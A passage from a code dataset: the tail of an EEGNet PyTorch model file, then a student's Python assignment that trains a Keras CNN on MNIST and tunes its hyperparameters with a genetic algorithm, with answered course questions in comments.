8), padding=0),\n nn.Dropout(p=do)\n )\n self.classify = nn.Sequential(\n nn.Linear(in_features=fout*23, out_features=2, bias=True)\n )\n def forward(self, x):\n res = self.firstConv(x)\n res = self.depthwiseConv(res)\n res = self.separableConv(res)\n res = res.view(res.size(0), -1)\n res = self.classify(res)\n return res\n","repo_name":"sean85914/deep_learning_2019","sub_path":"Lab2/code/eeg.py","file_name":"eeg.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30544926387","text":"\n# %%\n# imports\nimport numpy as np\nfrom sklearn.datasets import fetch_openml\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\n\n# for the random seed\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.keras.optimizers import SGD\nfrom tensorflow.keras.optimizers import RMSprop\nfrom tensorflow.keras.optimizers import Adagrad\nfrom tensorflow.keras.initializers import RandomUniform\nfrom time import time\nfrom random import randint\n\n#tf.debugging.set_log_device_placement(False)\n\ntry:\n\ttf.device('/device:GPU')\nexcept:\n\ttf.device('/device:CPU')\n\n# set the random seeds to get reproducible results\nprint(\"#\"*25, \" Code Start\", \"#\"*25,\"\\n\")\nnp_seed = np.random.seed(1)\ntf_seed = tf.random.set_seed(2)\n\n# Load data from https://www.openml.org/d/554\nprint(\"#\"*25, \" Load Data\", \"#\"*25,\"\\n\")\nX, y = fetch_openml('mnist_784', version=1, return_X_y=True)\n\nX, y = X[:1000], y[:1000] # modified from 1000 to 5000\n# reduces the dataset which has 70000 images to a smaller set\n\n### deep learning is supervised \n#X = X.reshape(X.shape[0], 28, 28, 1) # rows, height, width, color channel\nX = X.reshape(X.shape[0], 28, 28, 1) # rows, height, width, color channel\n# Normalize\nX = X / 255. # 8bit 2**8 =256 \n\n# number of unique classes\nnum_classes = len(np.unique(y))\ny = y.astype(int)\nprint(\"#\"*25, \" Split Data\", \"#\"*25,\"\\n\")\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.2, random_state=1)\n\nnum_tot = y.shape[0] # number images in the dataset\nnum_train = y_train.shape[0] #number of images for the training phase\nnum_test = y_test.shape[0] #number of images for the test phase\n\nprint(\"#\"*25, \" One Hot Encoding\", \"#\"*25,\"\\n\")\ny_oh = np.zeros((num_tot, num_classes)) #generate a blank array to be filled with one-hotenc\ny_oh[range(num_tot), y] = 1 # replace \n\ny_oh_train = np.zeros((num_train, num_classes))\ny_oh_train[range(num_train), y_train] = 1\n\ny_oh_test = np.zeros((num_test, num_classes))\ny_oh_test[range(num_test), y_test] = 1\n\nprint(\"#\"*25, \" Questions Part I\", \"#\"*25,\"\\n\")\n#### Question 1 Code Answers\nfor num, y_value in enumerate(y):\n\tif num<10:\n\t\tprint(y_value, y_oh[num])\n\nax1 = plt.subplot(131) ### ( row=1 column=3 imgnumber=1 )\nax1.imshow(X[0]) ### X must be in the reshaped form (28,28,1) or (28,28) depeding on the matplot lib version\nax1.set_title( label = \"Y label = \"+ str( y[0] ))\n\nax2 = plt.subplot(132) ### ( row=1 column=1 imgnumber=2 )\nax2.imshow(X[10]) ### X must be in the reshaped form (28,28,1) or (28,28) depeding on the matplot lib version\nax2.set_title( label = \"Y label =\"+ str(y[10]))\n\nax3 = plt.subplot(133) ### ( row=1 column=1 imgnumber=3 )\nax3.imshow(X[20]) ### X must be in the reshaped form (28,28,1) or (28,28) depeding on the matplot lib version\nax3.set_title( label = \"Y label =\"+ str(y[20]))\nplt.show()\n# %%\nprint(\"#\"*25, \" Load CNN Class \", \"#\"*25,\"\\n\")\nclass MyCNN():\n\tdef __init__(self,\n\t\t\t\t X_train, y_oh_train, X_test, y_oh_test, y_test,\n\t\t\t\t activ_func = 'relu', last_layer_func = 'softmax' , ### Functions\n\t\t\t\t standard_kernel = (3, 3), input_shape=(28, 28, 1), ### CNN input\n\t\t\t\t num_classes = 10 , ### CNN output\n\t\t\t\t min_image_kernels = 16, dropout_rate = 0.1, ### CNN parameters\n\t\t\t\t lr = 0.02, decay = 1e-6, momentum = 0.9, ### Optimizer parameters\n\t\t\t\t batch_size = 1000, epochs=1000, ### Batch and Epoch\n\t\t\t\t loss='categorical_crossentropy', optimizer = \"SGD\"): ### loss type\n\n\t\tself.X_train = X_train\n\t\tself.y_oh_train = y_oh_train\n\t\tself.X_test = X_test\n\t\tself.y_oh_test = y_oh_test\n\t\tself.y_test = y_test\n\n\t\tself.activ_func = activ_func\n\t\tself.last_layer_func = last_layer_func\n\t\tself.standard_kernel = standard_kernel\n\t\tself.input_shape = input_shape\n\t\tself.num_classes = num_classes\n\t\tself.dropout_rate = dropout_rate\n\t\tself.mik = min_image_kernels\n\t\tself.lr = lr\n\t\tself.decay=decay\n\t\tself.momentum=momentum\n\t\tself.batch_size = batch_size\n\t\tself.epochs = epochs\n\t\t\n\t\tself.optimizer = optimizer\n\t\t#self.initializer = tf.keras.initializers.Zeros()\n\t\t### under dev. = initializer =RandomUniform(minval=0.9, maxval=1., seed=1)\n\n\tdef create_model(self):\n\n\t\tself.model = Sequential()\n\t\tself.model.add( Conv2D( self.mik , (3, 3), \n\t\t\t\t\t\t\t activation= self.activ_func, \n\t\t\t\t\t\t\t input_shape= self.input_shape\n\t\t\t\t\t\t\t ))\n\n\t\t### Conv layer 1 - getting overall details\n\t\t### the more add number of filters/kernel the better, usually your network is\n\t\t### the higher the kernel shape you pick large part information\n\n\t\t# Max pooling\n\t\tself.model.add( MaxPooling2D ( pool_size = (2, 2) ) )\n\t\tself.model.add(Dropout(self.dropout_rate))\n\n\t\tself.model.add(Conv2D(self.mik * 2 , (3, 3), \n\t\t\t\t\t\t\t\tactivation = self.activ_func\n\t\t\t\t\t\t\t\t)) ### Conv layer 2 - getting more details\n\t\t# Max pooling\n\t\tself.model.add( MaxPooling2D ( pool_size = (2, 2) ) ) ### resuming information does not has weights\n\n\t\tself.model.add(Flatten())\n\n\t\tself.model.add(Dense( self.mik * 8, \n\t\t\t\t\t\t\t\tactivation = self.activ_func\n\t\t\t\t\t\t\t\t)) ### first hidden layer of the fully connected\n\n\t\tself.model.add(Dropout(self.dropout_rate))\n\n\t\tself.model.add(Dense(self.num_classes, activation=self.activ_func\n\t\t\t\t\t\t\t\t))\n\n\t\tself.sgd = SGD(lr = self.lr, decay = self.decay, momentum = self.momentum, nesterov=True) #####\n\t\tself.rmsp = RMSprop(learning_rate = self.lr, rho=0.9, momentum=0.0, epsilon= self.decay, centered=False)\n\t\tself.adag =Adagrad(learning_rate=self.lr, initial_accumulator_value=0.1, epsilon=self.decay)\n\n\t\tif self.optimizer == \"SGD\":\n\t\t\toptim = self.sgd\n\t\telif self.optimizer == \"RMSProp\":\n\t\t\toptim = self.rmsp\n\t\telif self.optimizer == \"AdaGrad\":\n\t\t\toptim = self.adag\n\n\t\t# Compile the model\n\t\tself.model.compile(loss='categorical_crossentropy', optimizer=optim )\n\n\tdef train(self):\n\t\tstart_time = time()\n\t\tself.history = self.model.fit(self.X_train, \n\t\t\t\t\t\t\t\t\t self.y_oh_train, \n\t\t\t\t\t\t\t\t\t batch_size= self.batch_size, \n\t\t\t\t\t\t\t\t\t epochs=self.epochs, verbose = 0,\n\t\t\t\t\t\t\t\t\t validation_data = (self.X_test,self.y_oh_test)) ### \n\t\tend_time = time()\n\t\tself.train_time = end_time - start_time\n\n\tdef plot_train(self):\n\t\tplt.plot(self.history.history['loss'])\n\t\tplt.title('model loss')\n\t\tplt.ylabel('loss')\n\t\tplt.xlabel('epoch')\n\t\tplt.legend(['train', 'val'], loc='upper left')\n\t\tplt.show()\n\n\tdef test(self):\n\t\t# Evaluate performance\n\t\tself.test_loss = self.model.evaluate(self.X_test, self.y_oh_test, batch_size= self.batch_size)\n\n\t\tself.predictions_perc = self.model.predict(self.X_test, batch_size = self.batch_size)\n\t\tself.predictions_norm = np.argmax(self.predictions_perc, axis=1) \n\t\t# change encoding again\n\n\t\tself.accuracy = ( (self.predictions_norm == self.y_test).sum() / self.predictions_norm.shape[0])\n\t\tprint('Accuracy:', self.accuracy, \"\\n\")\n\nprint(\"#\"*25, \" Load Genetic Algorithm Class \", \"#\"*25,\"\\n\")\nclass Genetic_Algorithm():\n\t\n\tdef __init__(self, \n\t\tlr_ls, decay_ls, batch_size_ls, epoch_ls, dropout_ls, optimizer_ls,\n\t\tX_train, y_oh_train, X_test, y_oh_test,y_test, \n\t\tnum_agents = 8): \n\t \n\t\t### Available Hyperparameters - lr_ls, decay_ls, batch_size_ls, epoch_ls, dropout_ls\n\t\t### Input train and test data - X_train, y_oh_train, X_test, y_oh_test,y_test\n\t\t### Genetic Algorithm hyperparameters - num_agents = 8 \n\t\tself.lr_ls = lr_ls\n\t\tself.decay_ls = decay_ls\n\t\tself.batch_size_ls = batch_size_ls\n\t\tself.epoch_ls = epoch_ls\n\t\tself.dropout_ls = dropout_ls\n\t\tself.optimizer_ls = optimizer_ls\n\n\t\tself.tt_gen_pos_01 = len(lr_ls)\n\t\tself.tt_gen_pos_02 = len(decay_ls)\n\t\tself.tt_gen_pos_03 = len(batch_size_ls)\n\t\tself.tt_gen_pos_04 = len(epoch_ls)\n\t\tself.tt_gen_pos_05 = len(dropout_ls)\n\t\tself.tt_gen_pos_06 = len(optimizer_ls)\n\n\t\tself.num_agents = num_agents\n\n\t\tself.X_train = X_train\n\t\tself.y_oh_train = y_oh_train\n\t\tself.X_test = X_test\n\t\tself.y_oh_test = y_oh_test\n\t\tself.y_test = y_test\n\n\t\tself.tested_policies = {}\n\n\t@staticmethod\n\tdef convert_policy_2_name(policy):\n\t\tpolicy_name = str(policy)[1:-1]\n\t\tpolicy_name = policy_name.replace(\", \", \"-\")\n\t\treturn policy_name\n\n\t@staticmethod\n\tdef convert_name_2_policy(policy_name):\n\t\tstr_ls = policy_name.split(\"-\")\n\t\tarray = np.array(str_ls).astype(int)\n\t\tpolicy = array.tolist()\n\t\treturn policy\n\n\t### under dev\n\tdef store_policy_result (self, result):\n\t\tpolicy = result[0]\n\t\t# result = [policy, modelCNN.history, modelCNN.train_time, modelCNN.accuracy, score]\n\n\t\tpolicy_name = self.convert_policy_2_name(policy)\n\n\t\tif policy_name not in self.tested_policies.keys():\n\t\t\tself.tested_policies[policy_name] = [result]\n\t\telse:\n\t\t\tpolicy_results = self.tested_policies[policy_name]\n\t\t\tpolicy_results.append(result)\n\t\t\tself.tested_policies[policy_name] = policy_results\n\t\t\t\t\t\t\t\t\t\t\t\t\n\tdef gen_random_policy(self):\n\t\t\n\t\tgen_pos_01 = randint(0, self.tt_gen_pos_01-1) ###learning_rate\n\t\tgen_pos_02 = randint(0, self.tt_gen_pos_02-1) ###decay_rate\n\t\tgen_pos_03 = randint(0, self.tt_gen_pos_03-1) ###batch_size\n\t\tgen_pos_04 = randint(0, self.tt_gen_pos_04-1) ###epochs\n\t\tgen_pos_05 = randint(0, self.tt_gen_pos_05-1) ###dropout_rate\n\t\tgen_pos_06 = randint(0, self.tt_gen_pos_06-1) ###dropout_rate\n\t\tpolicy = [gen_pos_01, gen_pos_02, gen_pos_03, gen_pos_04, gen_pos_05,gen_pos_06 ]\n\t\t### A policy is composed by index to retrieve values from:\n\t\t# self.lr_ls where policy[0] = lr\n\t\t# self.decay_ls where policy[1] = decay\n\t\t# self.batch_size_ls where policy[2] = batch_size\n\t\t# self.epoch_ls where policy[3] = epochs\n\t\t# self.dropout_ls where policy[4] = dropout_rate\n\t\treturn policy\n\t\n\tdef generate_single_agent (self, policy):\n\n\t\tlr_index = policy[0]\n\t\tdecay_index = policy[1]\n\t\tbs_index = policy[2]\n\t\tep_index = policy[3]\n\t\tdr_index = policy[4]\n\t\topt_index = policy[5]\n\t\t\n\t\tmodelCNN = MyCNN(self.X_train, self.y_oh_train, \n\t\t\t\t\t\t\tself.X_test, self.y_oh_test, self.y_test,\n\t\t\t\t\t\t\tdropout_rate = self.dropout_ls[dr_index], \n\t\t\t\t\t\t\tlr = self.lr_ls[lr_index], \n\t\t\t\t\t\t\tdecay = self.decay_ls[decay_index], \n\t\t\t\t\t\t\tbatch_size = self.batch_size_ls[bs_index], \n\t\t\t\t\t\t\tepochs=self.epoch_ls[ep_index],\n\t\t\t\t\t\t\toptimizer=self.optimizer_ls[opt_index])\n\n\t\tprint('#'*3,' Model Training: \\n')\n\t\tprint('- optimizer : lr= {} decay= {}'.format( self.lr_ls[lr_index], self.decay_ls[decay_index]))\n\t\tprint('- neurons : dropout_rate {}'.format(self.dropout_ls[dr_index]))\n\t\tprint('- batch_size= {} epochs= {} '.format(self.batch_size_ls[bs_index], self.epoch_ls[ep_index]),'#'*3,\"\\n\")\n\n\t\tmodelCNN.create_model()\n\t\tmodelCNN.train()\n\t\tmodelCNN.test()\n\t\t#print(modelCNN.model.summary())\n\t\tresult = [policy, modelCNN.history, modelCNN.train_time, modelCNN.accuracy] \n\t\treturn result\n\n\tdef initialize_agents(self):\n\t\tself.overall_results = []\n\t\t\n\t\tfor _ in range(self.num_agents):\n\t\t\tpolicy = self.gen_random_policy()\n\t\t\tresult = self.generate_single_agent(policy)\n\t\t\t#[:,0]\n\t\t\t#if policy not in self.overall_results: ###\n\t\t\tself.overall_results.append(result)\n\t\t\tself.store_policy_result(result)\n\t\t\n\tdef evaluate_policies(self):\n\t\tresults_array = np.array(self.overall_results)\n\t\taccuracy_arr = results_array[:,3]\n\t\tself.overall_accuracy = accuracy_arr.mean()\n\t\tself.max_accuracy = accuracy_arr.max()\n\n\t\ttime_arr = results_array[:,2]\n\t\tself.overall_time = time_arr.mean()\n\t\tself.min_time = time_arr.min()\n\t\t\n\t\tpolicy_score_sorter = {}\n\t\tsorted_scores = []\n\t\tfor num, result in enumerate(self.overall_results):\n\t\t\tscore = 0 \n\t\t\t\n\t\t\tif result[3] > 0.5:\n\t\t\t\tscore += 10\n\n\t\t\tif result[3] >= self.overall_accuracy:\n\t\t\t\tif result[3] == self.max_accuracy:\n\t\t\t\t\tscore += 20\n\n\t\t\t\telse:\n\t\t\t\t\tscore += 3\n\t\t\t\n\t\t\tif result[2] <= self.overall_time:\n\t\t\t\tif result[2] == self.min_time:\n\t\t\t\t\tscore += 10\n\t\t\t\telse:\n\t\t\t\t\tscore += 5\n\n\t\t\tpolicy_score_sorter[num] = score \n\n\t\tsorted_scores = sorted(policy_score_sorter.items(), \n\t\t\t\t\t\t\t\t key=lambda kv: kv[1], \n\t\t\t\t\t\t\t\t reverse=True)\n\t\tsorted_policies = [] \n\t\t### sorted_policies [(score, policy)] it will sort from highest to lowest\n\t\tfor policy_num, score in sorted_scores:\n\t\t\tsorted_policies.append(self.overall_results[policy_num])\n\t\t\n\t\tself.overall_results = sorted_policies\n\t\n\tdef agent_selection (self):\n\t\t\n\t\tself.parents = []\n\t\t### Make sure odd numbers are not used\n\t\t### The last agent with the worst performance is droppped\n\t\tif len(self.overall_results)%2 != 0:\n\t\t\tself.overall_results.pop(-1)\n\t\t### max pairs is the number of existing agents divided by four\n\t\t### since each pair generates 2 offsprings \n\t\t### we will keep the same number of agents to avoid exponential growth of agent population\n\t\tmax_pairs = int(len(self.overall_results)//4)\n\t\tpossible_parents = len(self.overall_results)-1\n\t\tcount = 0\n\n\t\twhile len(self.parents) < max_pairs:\n\n\t\t\tif count < max_pairs:\n\n\t\t\t\tparent1 = count\n\t\t\t\tparent2 = np.random.choice(possible_parents, size=((1)))[0]\n\t\t\t\tparents_codes = np.array([parent1,parent2])\n\n\t\t\telse:\n\t\t\t\tparents_codes = np.random.choice(possible_parents, size=((2)))\n\n\t\t\tif parents_codes[0] != parents_codes[1]:\n\n\t\t\t\tparent1 = parents_codes[0]\n\t\t\t\tparent2 = parents_codes[1]\n\n\t\t\t\tpolicy1 = np.array(self.overall_results[parent1][0])\n\t\t\t\tpolicy2 = np.array(self.overall_results[parent2][0])\n\t\t\t\t#\n\t\t\t\tself.parents.append([policy1,policy2])\n\t\t\t\tcount += 1\n\n\tdef crossover(self, policy1, policy2,genes_pos = [0, 2, 4]):\n\t\t'''\n\t\tArguments\n\t\t----------\n\t\tpolicy1: parent 1\n\t\tpolicy2: parent 2\n\t\tself.tt_gen_pos_01 = len(lr_ls)\n\t\tself.tt_gen_pos_02 = len(decay_ls)\n\t\tself.tt_gen_pos_03 = len(batch_size_ls)\n\t\tself.tt_gen_pos_04 = len(epoch_ls)\n\t\tself.tt_gen_pos_05 = len(dropout_ls)\n\t\tReturn\n\t\t--------\n\t\tnew_policy: offspring\n\t\t'''\n\t\tpolicyX = policy1.copy()\n\t\tpolicyY = policy2.copy()\n\t\tfor g_pos in genes_pos:\n\t\t\t#from IPython import embed; embed()\n\t\t\tslice_policyX = policyX[g_pos]\n\t\t\tslice_policyY = policyY[g_pos]\n\n\t\t\tpolicyY[g_pos]=slice_policyX\n\t\t\tpolicyX[g_pos]=slice_policyY\n\n\t\tchild_policy1 = policyY\n\t\tchild_policy2 = policyX\n\t\t# IMPLEMENT!\n\t\t# generate a child policy from cross-over of the parents\n\n\t\treturn child_policy1, child_policy2\n\n\tdef mutation (self, policy, nun_gen_2_mutate = 2, mut_prob_thr=0.05):\n\n\t\tmutation_prob = float(np.random.choice(100,1))/100\n\t\tavailable_positions = np.arange(0,5)\n\n\t\tif mutation_prob <= mut_prob_thr:\n\n\t\t\tpositions = []\n\t\t\tmutations = []\n\n\t\t\tfor _ in range(nun_gen_2_mutate):\n\n\t\t\t\tposition = int( np.random.choice( 6, 1) ) ## 5 gen positions\n\t\t\t\tif position == 0:\n\t\t\t\t\tall_moves = self.tt_gen_pos_01 - 1\n\t\t\t\telif position == 1:\n\t\t\t\t\tall_moves = self.tt_gen_pos_02 - 1\n\t\t\t\telif position == 2:\n\t\t\t\t\tall_moves = self.tt_gen_pos_03 - 1\n\t\t\t\telif position == 3:\n\t\t\t\t\tall_moves = self.tt_gen_pos_04 - 1\n\t\t\t\telif position == 4:\n\t\t\t\t\tall_moves = self.tt_gen_pos_05 - 1\n\t\t\t\telif position == 5:\n\t\t\t\t\tall_moves = self.tt_gen_pos_06 - 1\n\t\t\t\tif all_moves == 0:\n\t\t\t\t\tmove =0\n\t\t\t\telse:\n\t\t\t\t\tmove = int( np.random.choice( all_moves, 1 ) ) \n\n\t\t\t\tif position not in positions:\n\t\t\t\t\tpos_mask = available_positions != position\n\t\t\t\t\tavailable_positions = available_positions[pos_mask]\n\t\t\t\t\tpositions.append(position)\n\t\t\t\telse:\n\t\t\t\t\tposition = int(np.random.choice(available_positions,1))\n\t\t\t\t\tpositions.append(position)\n\t\t\t\t\n\t\t\t\tmutate = [move, position] \n\t\t\t\tmutations.append(mutate)\n\t\t\t\tpolicy[position] = move\n\n\t\treturn policy\n\t\n\tdef update_agents(self):\n\n\t\tself.agent_selection() ### this updates which agents will perfom crossover in the self.parents where parents = [ [policy1,policy2], [policyN,policyM]]\n\t\t\n\t\tnew_policies = []\n\t\tfor policy1, policy2 in self.parents:\n\t\t\tchild_policy1, child_policy2 = self.crossover(policy1, policy2)\n\n\t\t\tchild_policy1 = self.mutation(child_policy1)\n\t\t\tchild_policy2 = self.mutation(child_policy2)\n\n\t\t\tnew_policies.append(child_policy1)\n\t\t\tnew_policies.append(child_policy2)\n\n\t\t### drop_weaker older agents\n\t\tnew_agents = int(len(new_policies))\n\t\tfor _ in range (new_agents):\n\t\t\tself.overall_results.pop(-1)\n\n\t\t### add new agents\n\t\tprint(\"\\n Add New Policies \")\n\t\tcount =0\n\t\tfor new_policy in new_policies:\n\t\t\tnew_policy_ls = new_policy.tolist() ### return from numpy to list format\n\t\t\tnew_result = self.generate_single_agent(new_policy_ls)\n\t\t\t#print(\"new_policy = \", count, new_policy)\n\t\t\t#print(\"overall_results lenght= \", len(self.overall_results))\n\t\t\t#print(\"shape overall_results = \", np.array(self.overall_results).shape)\n\t\t\tself.overall_results.append(new_result)\n\t\t\tself.store_policy_result(new_result)\n\t\t\tcount += 1\n\t\t\n\tdef show_result(self,result,num):\n\n\t\tpolicy = result[0]\n\n\t\tlr_index = policy[0]; lr = self.lr_ls[lr_index]\n\t\tdecay_index = policy[1]; decay = self.decay_ls[decay_index] \n\t\tbs_index = policy[2]; batch_size = self.batch_size_ls[bs_index]\n\t\tep_index = policy[3]; epochs=self.epoch_ls[ep_index]\n\t\tdr_index = policy[4]; dropout_rate = self.dropout_ls[dr_index] \n\t\topt_index = policy[5]; optimizer = self.optimizer_ls[opt_index] \n\t\t\n\t\thistory = result[1]\n\t\tplt.plot(history.history['loss'])\n\t\tplt.plot(history.history['val_loss'])\n\t\ttitle = 'model number {} time to train= {} seconds and accuracy {} % \\n'.format( num, np.round(result[2], decimals=2), np.round(result[3], decimals = 3)*100)\n\t\ttitle += ' - optimizer: {} lr= {} decay= {} \\n'.format(optimizer, lr, decay)\n\t\ttitle += ' - neurons : dropout_rate {} \\n'.format(dropout_rate)\n\t\ttitle += ' - batch_size= {} epochs= {} '.format(batch_size, epochs)\n\t\t\t\t\n\t\tplt.title( title)\n\t\tplt.ylabel('loss')\n\t\tplt.xlabel('epoch')\n\t\tplt.legend(['train', 'val'], loc='upper left')\n\t\tplt.ylim((0,15))\n\t\tplt.show()\n\n\tdef best_models(self, final_models = 3, max_generations = 5):\n\n\t\tcount = 0\n\t\twhile count <= max_generations:\n\t\t\tprint(\"#\"*200)\n\t\t\tprint(\"#\"*25, \" Generation {}\".format(count), \"#\"*25,\"\\n\")\n\t\t\tif count == 0:\n\t\t\t\tself.initialize_agents()\n\t\t\telse:\n\t\t\t\tself.update_agents()\n\t\t\tself.evaluate_policies()\n\t\t\tcount += 1\n\t\t\n\t\tbest_models = []\n\t\tfor num in range(final_models):\n\t\t\tresult = self.overall_results[num]\n\t\t\tself.show_result(result,num)\n\t\t\tbest_models.append(result)\n\t\treturn result\n\nprint(\"#\"*25, \" Set hyperparameters lists\", \"#\"*25,\"\\n\")\nlr_ls = [1e-3,1e-4]\ndecay_ls = [1e-6,1e-7]\nbatch_size_ls = [32,500]\nepoch_ls = [150,250]\ndropout_ls = [0.05, 0.01]\noptimizer_ls = [\"SGD\",\"AdaGrad\",\"RMSProp\"]\n\nprint(\"#\"*25, \" Genetic Algorithm Start\", \"#\"*25,\"\\n\")\nga = Genetic_Algorithm(lr_ls,decay_ls,batch_size_ls, epoch_ls, dropout_ls, optimizer_ls,\n\t\t\t\t\t\tX_train, y_oh_train, X_test, y_oh_test, y_test, num_agents=30)\n\nprint(\"#\"*25, \" Set hyperparameters lists\", \"#\"*25,\"\\n\")\nbest = ga.best_models(final_models = 10, max_generations = 2)\n\nall_results = ga.tested_policies\n\nfor policy_name in all_results.keys():\n\tpolicy = ga.convert_name_2_policy(policy_name)\n\n\tlr_index = policy[0]\n\tdecay_index = policy[1]\n\tbs_index = policy[2]\n\tep_index = policy[3]\n\tdr_index = policy[4]\n\topt_index = policy[5]\n\t\n\tdropout_rate = ga.dropout_ls[dr_index], \n\tlr = ga.lr_ls[lr_index], \n\tdecay = ga.decay_ls[decay_index], \n\tbatch_size = ga.batch_size_ls[bs_index], \n\tepochs=ga.epoch_ls[ep_index]\n\toptimizer = ga.optimizer_ls[opt_index]\n\n\tfor result in all_results[policy_name]:\n\t\t\n\t\ttitle = '\\n model - time to train= {} seconds and accuracy {} % \\n'.format( np.round(result[2], decimals=2), np.round(result[3], decimals = 3)*100)\n\t\ttitle += ' - optimizer :{} lr= {} decay= {} \\n'.format(optimizer, lr, decay)\n\t\ttitle += ' - neurons : dropout_rate {} \\n'.format(dropout_rate)\n\t\ttitle += ' - batch_size= {} epochs= {} '.format(batch_size, epochs)\n\t\tprint(title)\n\n\n# %%\n\n\n# ### Question 1\n# **The data set**\n# \n# Plot a three examples from the data set.\n# * What type of data are in the data set?\n# \n# \n# The MNIST dataset contains grayscale images of handwritten numbers from zero to nine. \n# \t\tWhen they are imported in the fetch_openml an array with shape images vs 784 is retrieved. \n# \t\t784 is the flattened form of the image and the input values are pixel values ranging from 0 – 255. \n# \t\tBecause it has only one color channel, it means that the dataset is grayscale.\n# \n# \n# * What does the line ```X = X.reshape(X.shape[0], 28, 28, 1)``` do?\n# \n# This operation reshapre the flatten array into a new array with (columns, height, witdh, colour_channel)\n# \n# \n# Look at how the encoding of the targets (i.e. ```y```) is changed. E.g. the lines\n# ```\n# y_oh = np.zeros((num_tot, num_classes))\n# y_oh[range(num_tot), y] = 1\n# ```\n# Print out a few rows of ```y``` next to ```y_oh```.\n# * What is the relationship between ```y``` and ```y_oh```?\n# \n# \n# \"y\" means the supervised information that tells you the specific input must belong to a output\n# \"y\" ranges from 0 to 9 while y_oh is the one_hot encoding.\n# \n# \n# \n# * What is the type of encoding in ```y_oh``` called and why is it used?\n# \n# \n# y_oh is the one_hot encoding and its used for classification problems.\n# Since deeplearning are based on math and numbers, \n# the output of a classification must be a numerical value and not a string. \n# Therefore a multiclassification problem should have a one hot encoded \n# so that the ouput of the neural network can be numerically compared with the prediction.\n# \n# Ex: A NN with three classes (\"dog,cat,human\") should have 3 columns one for dog, one for cat and another for humam\n# a dog picture would have its one hot encoding (1 , 0 , 0) because it belongs to one class \n# a cat picture would have its one hot encoding (0 , 0 , 1) and a human would have (0, 0, 1)\n# \n# \n# \n# * Plot three data examples in the same figure and set the correct label as title. \n# * It should be possible to see what the data represent.\n\n# %%\n# ### Question 2\n# **The model**\n# \n# Below is some code for bulding and training a model with Keras.\n# * What type of network is implemented below? I.e. a normal MLP, RNN, CNN, Logistic Regression...?\n# The type of the network used is CNN (Convolutional Neural Networks) \n# * What does ```Dropout()``` do?\n# \"Dropout randomly disconnects neurons connections to make the CNN more genralist, \n# and thus reducing the probability of overfitting\" \n# * Which type of activation function is used for the hidden layers?\n# Rectified Linear Unit (ReLU) \n# * Which type of activation function is used for the output layer?\n# Softmax \n# * Why are two different activation functions used?\n# ReLU is used to solve the vanishing gradient problem \n#\t\t\t\t\t\t\t and it reduced the influence of negative values after a convolution,\n# while softmax is used to transform the output layer probabilities\n# into the most probable output \n# * What optimizer is used in the model below?\n# Although the name of the function is SGD (Stochastic Gradient Descent)\n# \t\t\t\t\t\tthe model useds batch gradient descent \n# * How often are the weights updated (i.e. after how many data examples)?\n# The epoch and batches will define when the weights are updated. \n# \t\t\t\t\t\t\tSince this specific model is using mini-batch gradient descent,\n# \t\t\t\t\t\t\tthe model will update their weights after completing a batch.\n# \t\t\t\t\t\t\tA dataset with 800 images with a batch size of 32 \n# \t\t\t\t\t\t\twill have 25 weights updates per epoch. \n# * What loss function is used?\n# \n# Categorical crossentropy \n# \n# \n# * How many parameters (i.e. weights and biases, NOT hyper-parameters) does the model have?\n# \n# <*answer here*> \n# \n#from IPython import embed; embed()\n\n# %%\n# ### Question 3\n# \n# * **Vizualize the training**. Use the model above to observe the training process. Train it for 150 epochs and then plot both \"loss\" and \"val_loss\" (i.e. loss on the valiadtion set, here the terms \"validation set\" and \"test set\" are used interchangably, but this is not always true). What is the optimal number of epochs for minimizing the test set loss? \n# * Remember to first reset the weights (```model.reset_states()```), otherwise the training just continues from where it was stopped earlier.\n# \n# * **Optimizer**. Select three different optimizers and for each find the close-to-optimal hyper-parameter(s). In your answer, include a) your three choises, b) best hyper-parameters for each of the three optimizers and, c) the code that produced the results.\n# * NOTEa that how long the training takes varies with optimizer. I.e., make sure that the model is trained for long enough to reach optimal performance.\n# \n# * **Dropout**. Use the best optimizer and do hyper-parameter seach and find the best value for ```Dropout()```.\n# \n# * **Best model**. Combine the what you learned from the above three questions to build the best model. How much better is it than the worst and average models?\n# \n# <*answer here*> \n# \n# \n# * **Results on the test set**. When doing this search for good model configuration/hyper-parameter values, the data set was split into *two* parts: a training set and a test set (the term \"validation\" was used interchangably wiht \"test\"). For your final model, is the performance (i.e. accuracy) on the test set representative for the performance one would expect on a previously unseen data set (drawn from the same distribution)? Why?\n# \n# <*answer here*> \n# \n# \n# ## Further information\n# For ideas about hyper-parameter tuning, take a look at the strategies described in the sklearn documentation under [model selection](https://scikit-learn.org/stable/model_selection.html), or in this [blog post](https://blog.tensorflow.org/2020/01/hyperparameter-tuning-with-keras-tuner.html) from TensorFlow. For a more thorough discussion about optimizers see [this video](https://www.youtube.com/watch?v=DiNzQP7kK-s) discussing the article [Descending through a Crowded Valley -- Benchmarking Deep Learning Optimizers](https://arxiv.org/abs/2007.01547).\n# \n# \n# **Good luck!**\n\n\n# %%\n","repo_name":"ricardoluhms/cnn_mnist_gen_alg","sub_path":"tutorial_mmai_assignment_3_v2.py","file_name":"tutorial_mmai_assignment_3_v2.py","file_ext":"py","file_size_in_byte":26398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
